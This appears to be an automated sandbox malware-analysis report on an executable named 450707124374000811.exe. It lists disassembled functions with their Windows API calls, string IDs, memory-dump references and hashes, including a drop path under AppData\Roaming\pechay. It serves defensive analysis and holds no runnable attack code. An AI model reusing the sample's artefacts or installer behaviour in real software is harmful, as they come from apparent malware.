                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                          Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\pechay\transskribere\jon, xrefs: 004021BD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon
                                                          • API String ID: 542301482-410581097
                                                          • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                          • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                          • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                          • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                          Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: p!C$p!C
                                                          • API String ID: 0-3125587631
                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                          • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                          • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                          Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                          • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                          • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                          • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                          Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                          • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                          • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                          • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                          Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                          • GetSysColor.USER32(?), ref: 00404494
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                          • lstrlenW.KERNEL32(?), ref: 004044B5
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                          • SendMessageW.USER32(00000000), ref: 00404537
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                          • SetCursor.USER32(00000000), ref: 004045B6
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                          • SetCursor.USER32(00000000), ref: 004045D2
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: +C@$Call$N
                                                          • API String ID: 3103080414-3697844480
                                                          • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                          • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                          • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                          • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                          • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                          • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                          • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                          Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                            • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                          • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                          • wsprintfA.USER32 ref: 00405F4D
                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                            • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                            • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]
                                                          • API String ID: 2171350718-461813615
                                                          • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                          • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                          • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                          • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                          Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3397512346
                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                          Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                          • GetSysColor.USER32(00000000), ref: 004042B7
                                                          • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                          • SetBkMode.GDI32(?,?), ref: 004042CF
                                                          • GetSysColor.USER32(?), ref: 004042E2
                                                          • SetBkColor.GDI32(?,?), ref: 004042F2
                                                          • DeleteObject.GDI32(?), ref: 0040430C
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                          Function 100022D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @Hmu
                                                          • API String ID: 4216380887-887474944
                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                          Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                          • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                          • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                          • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                          • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                          • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                          Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                          • GetMessagePos.USER32 ref: 00404BD3
                                                          • ScreenToClient.USER32(?,?), ref: 00404BED
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
